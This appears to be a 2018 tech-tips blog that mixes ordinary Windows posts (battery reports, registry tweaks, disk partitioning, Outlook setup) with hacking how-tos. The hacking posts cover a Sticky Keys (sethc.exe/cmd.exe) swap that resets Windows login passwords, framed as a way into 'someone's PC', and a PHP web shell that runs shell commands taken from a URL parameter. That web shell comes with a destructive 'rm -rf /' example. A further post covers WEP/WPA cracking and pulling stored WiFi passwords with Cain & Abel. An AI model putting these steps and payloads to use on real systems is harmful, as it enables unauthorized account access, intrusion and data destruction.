Wednesday, November 21, 2018

Hack Windows 10 Login Password In 2 Minutes

Forgot Windows Administrator Password? The first thing a normal user tries to do is take the PC to service center and do a  fresh re-installation of windows. In that case, one may lose all the data, not to mention the service charges.  In another scenario, suppose if you want to hack into someone's PC there are a few methods to follow, like using Hiren CD, Trinity Rescue Kit, OphCrack etc. It takes a considerable amount of time and computer skills and also these methods are not always successful. In such cases, the below given method comes in handy.

Method 1

) Any Linux live CD(like Ubuntu CD)/USB. If you don't have one download any Linux distribution ISO file and Make a bootable CD/USB. For simplicity sake, I suggest Puppy Linux (lightest Linux distro, less than 200mb)

2)Basic knowledge in dealing with cmd, boot menu etc.

So let's get started.

1)Insert the live CD/USB and boot from it.

2)Locate the drive where Windows is installed.(C drive) Goto Windows/system32 folder.

3)Find out a file named 'cmd.exe' and rename it to 'cmd0.exe'

4)Next, find another file by the name 'sethc.exe' [It is the program for windows sticky keys] Rename sethc.exe to cmd.exe.

5)Finally, rename cmd0.exe to sethc.exe. [Swapping the sticky keys program with Command Prompt (cmd). So whenever Sticky Keys program is called it runs cmd and vice versa. ]

5)Great! Now Shutdown and boot into Windows.

6)Press shift key five or six times at the login screen.

7)Now the command prompt will open up. Type this without quotes and hit enter.

"net user"

 8) Now you can see the list of active accounts [User Names] in the PC. Make a note of the Account Name you need to hack.

9) type the following command and hit enter.

"net user <space><Account Name><space> *"

Note  <space>: leave space

          <Account Name> Replace it with the account you need to hack. In this example 'Mathews'

8)It will display 'enter new password'. Enter any new password and confirm. To remove password leave it blank.

Done! You can log in with the new password now.


Sunday, November 18, 2018

Hacking Linux OS

Linux is the most widely used server operating system, especially for web servers. It is open source; this means anybody can have access to the source code. This makes it less secure compared to other operating systems as attackers can study the source code to find vulnerabilities. Linux Hacking is about exploiting these vulnerabilities to gain unauthorized access to a system.

Linux Hacking Tools

  • Nessus– this tool can be used to scan configuration settings, patches, and networks etc. it can be found at
  • NMap. This tool can be used to monitor hosts that are running on the server and the services that they are utilizing. It can also be used to scan for ports. It can be found at
  • SARA – SARA is the acronym for Security Auditor’s Research Assistant. As the name implies, this tool can be used to audit networks against threats such as SQL Injection, XSS etc. it can be found at
The above list is not exhaustive; it gives you an idea of the tools available for hacking Linux systems.

How to prevent Linux hacks

Linux Hacking takes advantage of the vulnerabilities in the operating system. An organization can adopt the following policy to protect itself against such attacks.
  • Patch management– patches fix bugs that attackers exploit to compromise a system. A good patch management policy will ensure that you constantly apply relevant patches to your system.
  • Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server. Inactive user names and daemons should be disabled. Default settings such as common passwords to application, default user names and some port numbers should be changed.
  • Intrusion Detection System– such tools can be used to detect unauthorized access to the system. Some tools have the ability to detect and prevent such attacks.

Hacking Activity: Hack a Ubuntu Linux System using PHP

In this practical scenario, we will provide you with basic information on how you can use PHP to compromise a Linux. We are not going to target any victim. If you want to try it out, you can install LAMPP on your local machine.
PHP comes with two functions that can be used to execute Linux commands. It has exec() and shell_exec() functions. The function exec() returns the last line of the command output while the shell_exec() returns the whole result of the command as a string.
For demonstration purposes, let’s assume the attacker managers to upload the following file on a web server.


$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

The above script gets the command from the GET variable named cmd. The command is executed using shell_exec() and the results returned in the browser.
The above code can be exploited using the following URL
  • “…konsole.php?cmd=ls%20-l”assigns the value ls –l to the variable cmd.
The command executed against the server will be
shell_exec('ls -l') ;
 Executing the above code on a web server gives results similar to the following.

The above command simply displays the files in the current directory and the permissions
Let’s suppose the attacker passes the following command

rm -rf /

  • “rm” removes the files
  • “rf” makes the rm command run in a recursive mode. Deleting all the folders and files
  • “/” instructs the command to start deleting files from the root directory
The attack URL would look something like this

Friday, November 16, 2018

How to Hack WiFi (Wireless) Network

How to Crack Wireless Networks

WEP cracking
Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks namely;

  • Passive cracking– this type of cracking has no effect on the network traffic until the WEP security has been cracked. It is difficult to detect.
  • Active cracking– this type of attack has an increased load effect on the network traffic. It is easy to detect compared to passive cracking. It is more effective compared to passive cracking.

WEP Cracking Tools

WPA Cracking

WPA uses a 256 pre-shared key or passphrase for authentications. Short passphrases are vulnerable to dictionary attacks and other attacks that can be used to crack passwords. The following tools can be used to crack WPA keys.

Cracking Wireless network WEP/WPA keys

It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are.
We will provide you with basic information that can help you get started. Backtrack is a Linux-based security operating system. It is developed on top of Ubuntu. Backtrack comes with a number of security tools. Backtrack can be used to gather information, assess vulnerabilities and perform exploits among other things.
Some of the popular tools that backtrack has includes;
  • Metasploit
  • Wireshark
  • Aircrack-ng
  • NMap
  • Ophcrack
Cracking wireless network keys requires patience and resources mentioned above. At a minimum, you will need the following tools
wireless network adapter with the capability to inject packets (Hardware)

  • Kali Operating System. You can download it from here
  • Be within the target network’s radius. If the users of the target network are actively using and connecting to it, then your chances of cracking it will be significantly improved.
  • Sufficient knowledge of Linux based operating systems and working knowledge of Aircrack and its various scripts.
  • Patience, cracking the keys may take a bit of sometime depending on a number of factors some of which may be beyond your control. Factors beyond your control include users of the target network using it actively as you sniff data packets.

Hacking Activity: Crack Wireless Password

In this practical scenario, we are going touse Cain and Abel to decode the stored wireless network passwords in Windows. We will also provide useful information that can be used to crack the WEP and WPA keys of wireless networks.

Decoding Wireless network passwords stored in Windows

  • Download Cain & Abel from the link provided above.
  • Open Cain and Abel

  • Ensure that the Decoders tab is selected then click on Wireless Passwords from the navigation menu on the left-hand side
  • Click on the button with a plus sign
  • Assuming you have connected to a secured wireless network before, you will get results similar to the ones shown below
 The decoder will show you the encryption type, SSID and the password that was used.



Thursday, November 15, 2018

laptop battery health

 How to check your laptop battery health in Windows 7

Windows 7 includes a new command that shows you a lot of details on its power usage & settings and helps you troubleshoot power issues (like Windows 7 waking up unexpectedly when you've put it in Sleep mode).
This command also shows you some detailed information about your laptop's battery, including its design capacity and the last full charge. With this data you can calculate how much (percentage-wise) your battery has deteriorated over time. Let's have a look:
  1. Click Start button and type cmd in Search programs and files box
  2. Right click on cmd.exe listed at the top of the Start menu and click Run as administrator
  3. In the command prompt type cd %userprofile%/Desktop and press Enter
  4. Next type powercfg -energy in the command prompt and press Enter

    powercfg will enable a trace for 60 seconds. If you want to use it for more information than just the battery details, make sure no other processes are running during that time

When finished, powercfg will generate a report (in html format) which shows errors, warnings etc. Since we directed the command prompt to your desktop, the report will be placed on your desktop as energy-report.html. Just open the report in your web browser & scroll down to the Battery Information section.

Above are two samples. On the left is a relatively new battery (a few months old). As you can see, the last full charge is only some 5.5% below the design capacity.
On the right is an old battery (around 4 years old) which shows that the last full charge was nearly 40% below the design capacity. From experience I know that this battery will only last a few months more. I've had a battery fail a few months after it tested 45% below its design capacity. I recently did a 'stress test' on this battery (which will show you the minimum time you can expect while running the laptop at 'full power'), and it only managed 36 minutes. Compare that with 125 minutes for the new battery.

Wednesday, November 14, 2018

Windows 7 Registry Hacks

Change Taskbar Button Stacked Window Behavior

By default, the Taskbar groups together multiple windows of a single app, then displays all of them as thumbnails when you click on the program’s Taskbar icon. If you think it would be more handy to have Windows automatically open the last window when you click the icon, you can make that happen.
1. Navigate to HKEY_CURRENT_USERSoftwareMicrosoftWindows
2. Right-click in the right pane, and select “New” then “DWORD (32-bit) Value.”
3. Rename the new DWORD value “LastActiveClick.”
4. Double-click on LastActiveClick to open it.
5. Change the value in the “Value data” field to 1.
6. Click OK.

Change the Width of Taskbar Buttons

Windows 7 is set up to always combine Taskbar buttons from the same program and never display their labels. If, however, you’ve changed the setting to either not combine the windows at all or to only combine them when the Taskbar is full, you can change the icons’ width to hide the labels there, too. Here’s how.
1. Navigate to HKEY_CURRENT_USERControl PanelDesktopWindowMetrics
2. Scroll to find the “MinWidth” entry. If it’s not there, you’ll have to create it yourself. Right-click in the right pane, select New, then Select “String Value,” and name the object MinWidth.
3. Double-click MinWidth to open it.
4. Change the number in the “Value Data” field the width you want to allot to the icons. With the default small buttons, 38 is sufficient; with the larger icons, you’ll want about 52.
5. Click OK.

Change the Delay Time of Taskbar Previews
Among the cooler features in Windows 7 are Taskbar previews, which appear when you hover the mouse cursor over the Taskbar icon of a currently running program. But when you do this, the preview doesn’t appear immediately. Luckily, it’s easy to speed it up (r, for whatever reason, slow it down.
1. Navigate to HKEY_CURRENT_USERSoftwareMicrosoftWindows
2. Right-click in the right pane, click “New,” and click “DWORD Value” or “DWORD (32-bit) Value.”
3. Name the new DWORD “ExtendedUIHoverTime.”
4. Double click on ExtendedUIHoverTime to open it.
5. Click the “Decimal” radio button in the “Base” section. In the “Value data” field, enter the delay time (in milliseconds) for the preview to appear. (The Windows standard is 400ms.)
6. Click “OK” to commit the change.

 Change the Delay Time of Aero Peek
Aero Peek is Windows 7’s sleeker replacement for the old Show Desktop button. Just move your mouse cursor over the icon at the right end of the Taskbar to turn all your Windows invisible. But this, too, has a delay time associated with it, so if you find yourself accidentally activating it too often, you may want to increase the delay time. Here’s how.
1. Navigate to HKEY_CURRENT_USERSoftwareMicrosoftWindows
2. Right-click in the right pane, click “New,” and click “DWORD Value” or “DWORD (32-bit) Value.”
3. Name the new DWORD “DesktopLivePreviewHoverTime.”
4. Double click on DesktopLivePreviewHoverTime to open it.
5. Click the “Decimal” radio button in the “Base” section. In the “Value data” field, enter the delay time (in milliseconds) for the preview to appear. (The Windows standard is 1,000ms.)
6. Click “OK” to commit the change


Tuesday, November 13, 2018

How to Partition Your Hard Drive

Disk partitioning is to divide the hard drive into multiple logical units. People don’t often choose to partition their hard disks, but it has many benefits. Mainly, by partitioning your disk, you can separate your operating system from your data and thus reduce the chances of your data becoming corrupted.

1. Open the Computer Management tool. Open the Start menu. Type “Computer Management” in the search bar of the Start menu and press enter.

2. Select the Disk Management tool. Click on Disk Management on the left side of the window and you should see all of the disks and their partitions on your computer.
 * In the example in the picture, there is 1 disk with two partitions

3. Make some space for the new partition. Right-click on the partition you wish to re-size and select the Shrink Volume option.
  • In the example in the picture the (C:) drive is used.
  • Note: There may be a partition named System Reserved. It is not recommended that you alter this partition at all
4. Shrink the drive. Enter the size you wish to shrink your drive to in megabytes (1000 MB = 1GB). Then click on the Shrink button.
  • In this example the drive is shrunk by 10000 MB or 10 GB.
  • Note: You cannot shrink your volume greater than the amount indicated in the Size of available shrink space in MB section.

5. Create a new volume. You should now see a new unallocated partition in your Disk Management window. Right-click on the unallocated partition and select the New Simple Volume option.

6. The New Simple Volume Wizard. The New Simple Volume Wizard should popup. Click on the Next button to continue

7. Enter size of new partition. Enter the amount of memory you wish to allocate for your new partition and click on the Next button.
  • In the example in the picture, the maximum memory available is allocated to the new volume.
  • Note: You cannot make your new volume larger than the maximum amount of memory available.

8. Give the new volume a letter name or path. Select from the menu, a letter name for your new partition and click on the “Next” button.
  • The letter name chosen for the example in the picture is (E:)
  • The letter name or path is used by Windows to identify and navigate to your new volume.

9. Settings for the new volume.
  • Click on the Format this volume with the following settings:
  • For File System, select NTFS
  • For Allocation unit size, select Default
  • For Volume Label, type the name you wish to give your new drive.
  • Click on the Perform a quick format
  • Then click on the Next button

 10. Create the new volume. Look over your settings and click on the Finish button

11. Format the new volume.
  • You will get a popup asking you to partition your new drive. Click on the Format disk button.
  • A new window will popup. Keep the settings and click on the Start button.
  • A warning will popup. Click on the OK button.   πŸ‘†

Monday, November 12, 2018

Reset Windows 7 Password with Windows Installation CD

Step 1
In order to do this, you must have a Windows installation CD or DVD. Any Windows 7, Vista or XP CD or DVD will work.
First you have to boot from the installation CD. Most PC’s are already set up to use the CD/DVD drive as the first boot device, which means you only have to insert the CD/DVD and restart the PC. Before Windows begins to load, you will see a message that says “press any key to boot from CD”, just press any key. However, if your PC is not set up to boot from the CD/DVD first, you will have to set it as your first boot device in the BIOS setup. If you don’t know how, it’s really easy. Soon as you turn your PC on, you can enter the BIOS setup by pressing the DEL key. Although you would normally use the DEL key, the key you have to press varies from PC to PC, but it will either be the DEL, F1, F2, ESC, or F10 key.
You have to be quite quick while doing this. The most sure-fire way of doing it correctly would be to turn your PC on and keep pressing the button until you get the BIOS screen.
Once you’re at the BIOS screen, navigate through the menus looking for something like “1st boot device, 2nd boot device”, or anything related to boot order. It is different with each PC, but it’s really strait forward. You should set the first boot device as the CD/DVD drive, and the second as your HDD (Hard Disk Drive). It wont matter what the third or fourth are.

Step 2
How that you’ve booted from the CD, you will have to option to install or repair Windows, click repair your computer. You will see various option as shown in the image bellow, click Command Prompt.

Step 3
Now that you’re in the command prompt, we are going to use a couple of commands that will allow you to reset Windows 7 Password.
First type copy c:\windows\system32\sethc.exe c:\
Next type copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
Now reboot the PC (remember to take the installation disk out)

Step 4
So you’ve restarted your PC and you’re at the login screen. Press the Shift key 5 times to bring up the command line interface. Now type net user your_name your_new_password.
For example, if the name of the account you want to reset the password for is called Duncan05 and the password you want to change to is Pass1234, you would type net user Duncan05 Pass1234.
That’s it, you can now login!
Note: The command we used earlier copied over the sethc.exe, replacing it with cmd.exe, which is why we were able to access the command line at the login screen. However, the first command we used backed up the sethc.exe the hard-disk. To restore it in Windows, go the Start Menu and type cmd in the search box. Then in the results, right-click “cmd” and then choose “run as administrator”.
You can the use the command c:\sethc.exe file back to c:\windows\system32\sethc.exe to restore the original sethc.exe file.
Sethc.exe is used to invoke accessibility options through the Shift key. However, you will not have any issues if you decide not to restore the original file.


reset windows login password

Method 1: Reset Lost Admin Password with the Hidden Administrator Account

This method includes the first thing which should do whenever you forget your Windows login password. When we install Windows, it automatically creates an account “Administrator” and sets its password to blank. So if you forget your user account password then try this:
  1. Start your computer and when you see Windows Welcome screen / login screen, press ctrl + alt + del key combination twice and it’ll show you the Classic Login box.
  2. Type Administrator in Username and leave Password field blank. Press Enter and you should be able to log in to Windows.
  3. Now you can reset your account password by accessing the Control Panel -> User Accounts.
You can also log in to the hidden administrator account from Safe Mode. In Safe Mode Windows will show this hidden Administrator account on the login screen.

Method 2: Reset Lost Admin Password with Password Reset Disk

The easiest way to reset a forgotten Windows password is to use a previously created password-reset disk. You can create such a disk on USB removable media within the Windows User Accounts menu by opening the Windows Control Panel, selecting User Accounts, and clicking “Create a password reset disk” in the left pane. But you will have the foresight to create a password reset disk before you forget password. Once you have the disk, you can reset lost admin password easily by following the steps below:
  1. Once you’ve typed the wrong password in the login screen, Windows will show a “Reset password” link below the login box.
  2. Make sure you already have the password reset disk inserted at this point, then click on the “Reset password” link.
  3. Follow the instructions in the Password Reset wizard. This will allow you to create a new password.
After that you should be able to log in to Windows with the new password. You can use the same password reset disk any time you need to reset your lost admin password.

Change Network Location to Public or Private in Windows 10

The first time you connect to a network, you’ll be prompted to turn on sharing and connect to devices. Turn on this settings will set your network location to private. A private network makes your computer discoverable to other PCs. If you don’t want to share musics, pictures, videos or even printers with other PCs on the network, you should set the network type to public. In this tutorial we’ll show you 3 ways to change network location to public or private in Windows 10.

Method 1: Change Windows 10 Network Location Using Group Policy
  1. Press the Windows key + R to open the Run box. Type secpol.msc and press Enter.

2.When the Local Security Policy window opens, click Network List Manager Policies in the left pane. Double-click on the name of the current network connection in the right pane.

3.Click the Network Location tab at the top. Under the Location type, you can choose either Private or Public.

     4.Click Apply and then OK to save your change.

Method 2: Change Windows 10 Network Location Using Registry Editor
  1. Press the Windows key + R to open the Run box. Type regedit and press Enter.
  2. In the left pane of Registry Editor, navigate to the key:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles
  3. Expand the Profiles key in the left pane. Click on each subkey and have a look if the ProfileName matches the name of your current network connection.

4.If you have found the right subkey, double-click the Category in the right pane and edit the DWORD to the value you want. Public: 0, Private: 1, Domain: 2.

 5. Reboot your computer to apply the new network location.

Method 3: Change Windows 10 Network Location Using PowerShell
  1. Open PowerShell in Administrator mode.
2.Type or paste the following command in the PowerShell and press Enter. It will list the name and properties of your active network connection. In my example, the network name is TLRouter. 


3.Type the following command and press Enter to change your network location to private. Replace TLRouter with your network name.

Set-NetConnectionProfile -Name "TLRouter" -NetworkCategory Private

If you want to change the network location to public, type this command instead:

Set-NetConnectionProfile -Name "TLRouter" -NetworkCategory Public

Sunday, November 11, 2018

Windows 7 Login Background change

                                 Customize Your Windows 7 Login Background

1.Open up your run command.(Fastest way todo isto do ‘Windows Key’ + r)
2.Type in regedit.

       3.Find HKEY_LOCAL_MACHINE > Software> Microsoft > Windows > CurrentVersion > Authentication > LogonUI > Background
      4. Double-click on OEMBackground
Change this value to 1.

    6.Click Okay and close out of regedit.
Open up Windows Explorer or My Computer and navigate to your Windows directory.
In your system32 folder in your windows directory, you’ll need to create a couple new folders. For the standard user, go to c:windowssystem32oobe and create a folder labeled info. Inside the info folder, make another folder called backgrounds.

Your final path should look like c:windowssystem32oobeinfobackgrounds

9. Place your image in this folder. Note 2 important things:
  • 1st: Your file must be labeled backgroundDefault.jpg
  • 2ndly: According a handful of sources, your file must less than 256kb in size, but I have never been able to successfully implement a background unless it was less than 250kb in size.
  • 10.To test if your background is working correctly, lock your computer with ‘Windows + L.’ Your image should now show up on your Windows Login screen.
  • 11.Alternatively, name your background to work with specific resolutions. Here are the background names:
    • background768×1280.jpg (0.6)
    • background900×1440.jpg (0.625)
    • background960×1280.jpg (0.75)
    • background1024×1280.jpg (0.8)
    • background1280×1024.jpg (1.25)

winndows blue screen error

Kill Windows with the Blue Screen of Death in 3 Keystrokes

To enable this feature, open up regedit and then browse down to one of these keys, depending on your keyboard type:

USB Keyboard


PS/2 Keyboard

Now right-click on the right-hand pane and add a new DWORD key named CrashOnCtrlScroll, giving it a value of 1

Reboot your computer, and when it starts back up you can trigger the Blue Screen of Death by using the following keyboard shortcut:
Hold down Right Ctrl and hit Scroll Lock twice

To remove this “feature” you can just delete the registry key and then restart your computer again.

Please note that following this article WILL crash your computer… really isn’t very useful, but it’s lots of fun =)

Saturday, November 10, 2018

                Windows Registry Tips

  1. Disable Windows Animation

         HKEY_CURRENT_USER \Control Panel \Desktop \WindowMetrics\MinAnimate

            Set this to 1

 2. Full-Color Icons
  HKEY_CURRENT_USER\Control Panel\desktop\WindowMetrics\Shell Icon BPP Give it a           value of 16

 3.Remove Hidden Shares
          HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parame ters\AutoShareServer
       Both of these REG_DWORD values set to 0 will prevent hidden shares from working

 4. Thumbnail Size

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Th umbnailSize

This DWORD value can be set between 32 and 256. This number represents the size in pixels that the Windows Explorer Thumbnail view will display

5.Change the Name of the Recycle Bin


Changing the text at the end of this value from Recycle Bin to the text of your choice will change the name of the recycle bin.

6. Remove Shutdown from the Start Menu 
    HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer\NoClose

This String Value set to 1 removes the Shutdown option from the Startmenu. Change it to
0 to allow shutdowns.

7. Disable CD-ROM Autorun

               Changing this value to 1 disables the CD-ROM autorun feature

 8. Change the name of My Computer

From this value you can change the name of the My Computer icon. The default value is:
@D:\WINNT\system32\shell32.dll,-9216@1033,My Computer
As you can see, the name is the last part after the , and you can change this to whatever you want. A neat trick is to change the My Computer part to %computername% and that will name My Computer the name that your computer has in the Network settings. If you do this it should look like this:

9.  Remove Desktop Icons 
         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Eexplor er\Desktop\NameSpace

A lot of programs install themselves and add an icon to the desktop. The problem is, this isn’t just a shortcut that can be deleted. These are permanent links to certain programs/features. In order to delete them, you need to navigate to this registry key and delete any entries you do not want

Thursday, November 08, 2018

How to Configure Microsoft Outlook

Adding an Email Account

Understand the difference between POP and IMAP email services. 
There are two ways that email can be delivered to your email client: POP (Post Office Protocol) and IMAP (Internet Message Access Protocol). POP is the older method of transferring email messages, and works by downloading new messages to your client and then deleting them from the server. IMAP was designed to allow you to check email from multiple devices, as messages and organization are synced between all of the clients you use. 
  • There is really no practical reason to use POP if IMAP is available. IMAP is more stable, more secure, and allows you to check your email from your computer, phone, and laptop without losing any messages.
  • Most email services allow you to use IMAP, though some may charge for it. Gmail, Yahoo!, (Hotmail), AOL, and most service providers allow for IMAP.

Configure your service for IMAP (Gmail). Most email services allow you to access the IMAP functions without making any changes. The major exception to this is Gmail, where you will need to manually enable IMAP. 
  • Log into the Gmail website and click the Gear button. Select "Settings' and then click the "Forwarding and POP/IMAP" tab. Select "Enable IMAP" and click "Save Changes".
3- Open Outlook. When you add an IMAP email service, you'll be able to check, organize, and manage your email in Outlook and on all of your other devices. Any changes you make in Outlook will be reflected in your other email clients.

4-Click the "File" tab. In the "Info" section, click the "+ Add Account" button.

Select "Manual setup or additional server types". This will allow you to enter any email account.
  • Note: If you're using Gmail or Hotmail (, you can enter your email address and password in the "E-Mail Account" section of the Add New Account window and skip the rest of this section. Outlook will take care of the rest of the configuration for you. You can also manually set them up if you prefer by reading on.
 Select "POP or IMAP". This will enable you to enter a web-based email account.

Enter your email account information. Enter your name as well as your email address in the top section. Leave the Server Information blank for now (see next step). In the Logon Information section, enter your account User Name (usually the same as your email address) as well as the password you use to access the account.

Enter your mail server information. In the Server Information section, enter in the information for your mail service. Select "IMAP" from the Account Type drop-down menu. Below is information for some of the more popular mail services:
Service  Incoming Mail Server   Outgoing Mail Server 
 Time Warner

Click the .More Settings... button. Click the Outgoing Server tab.

Check the "My outgoing server (SMTP) requires authentication". Select "Use same settings as my incoming mail server". This setting is the same for nearly all email services.

Click the .Advanced tab. These settings are usually correct, but you'll want to verify them using the table below:

Service  Incoming Server/
 Outgoing Server/
Gmail 993/SSL 587/TLS
Yahoo! 993/SSL 465/SSL
Hotmail 993/SSL 587/TLS
AOL 993/SSL 587/SSL
Comcast 993/SSL 587/TLS
 Time Warner  143/SSL 587/SSL
AT&T 993/SSL 465/SSL

Click .Next > after entering all of your account settings. Outlook will begin testing your settings to ensure that it can connect to the server to send and receive messages.

Wait for your messages to sync. once you've connected your email account, your messages and folders will begin syncing with Outlook. Depending on how many messages you have, this may take a few moments. You can monitor the process from the status bar at the bottom of the window.
  • Outlook will only have to do a major sync the first time you connect your account. After this, it will just sync any changes made from any of your email clients.